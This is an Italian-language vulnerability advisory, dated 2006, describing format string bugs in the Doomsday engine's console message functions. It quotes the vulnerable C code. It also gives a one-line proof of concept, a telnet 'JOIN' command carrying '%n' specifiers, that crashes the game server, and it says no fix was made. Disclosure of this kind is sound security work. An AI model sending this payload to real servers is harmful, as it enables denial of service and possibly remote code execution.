####################################################################### Luigi Auriemma Applicazione: Doomsday engine http://www.doomsdayhq.com http://deng.sourceforge.net Versioni: <= 1.8.6 (e SVN 1.9.0) Piattaforme: Windows, *nix, *BSD, Mac ed altre Bug: format string bug in Con_Message e Con_Printf Exploitation: remoto, contro server e clients Data: 03 Apr 2006 Autore: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduzione 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduzione =============== Il Doomsday engine e' un port open source molto conosciuto del motore originale del buon vecchio Doom. Inoltre e' anche uno dei piu' giocati su Internet. ####################################################################### ====== 2) Bug ====== Il Doomsday engine contiene diverse funzioni usate pe la visualizzazione dei messaggi nella console. Sia Con_Message che conPrintf sono vulnerabili ad una vulnerabilita' di tipo format string che potrebbe permettere ad un attacker di eseguire codice malevolo contro il server od i clients. La prima funzione chiama "Con_Printf(buffer)" mentre la seconda "SW_Printf(prbuff)" se SW_IsActive e' abilitato (ossia sempre). Da Src/con_main.c: void Con_Message(const char *message, ...) { va_list argptr; char *buffer; if(message[0]) { buffer = malloc(0x10000); va_start(argptr, message); vsprintf(buffer, message, argptr); va_end(argptr); #ifdef UNIX if(!isDedicated) { // These messages are supposed to be visible in the real console. fprintf(stderr, "%s", buffer); } #endif // These messages are always dumped. If consoleDump is set, // Con_Printf() will dump the message for us. if(!consoleDump) printf("%s", buffer); // Also print in the console. Con_Printf(buffer); free(buffer); } Con_DrawStartupScreen(true); } ... void conPrintf(int flags, const char *format, va_list args) { unsigned int i; int lbc; // line buffer cursor char *prbuff, *lbuf = malloc(maxLineLen + 1); cbline_t *line; if(flags & CBLF_RULER) { Con_AddRuler(); flags &= ~CBLF_RULER; } // Allocate a print buffer that will surely be enough (64Kb). // FIXME: No need to allocate on EVERY printf call! prbuff = malloc(65536); // Format the message to prbuff. vsprintf(prbuff, format, args); if(consoleDump) fprintf(outFile, "%s", prbuff); if(SW_IsActive()) SW_Printf(prbuff); ... ####################################################################### =========== 3) The Code =========== Connettersi con telnet alla porta 13209 (default) del server di DoomsDay e digitare: JOIN 1234 %n%n%n%n%n%n Il server crashera' immediatamente. ####################################################################### ====== 4) Fix ====== No fix. Nessuna risposta dagli sviluppatori. #######################################################################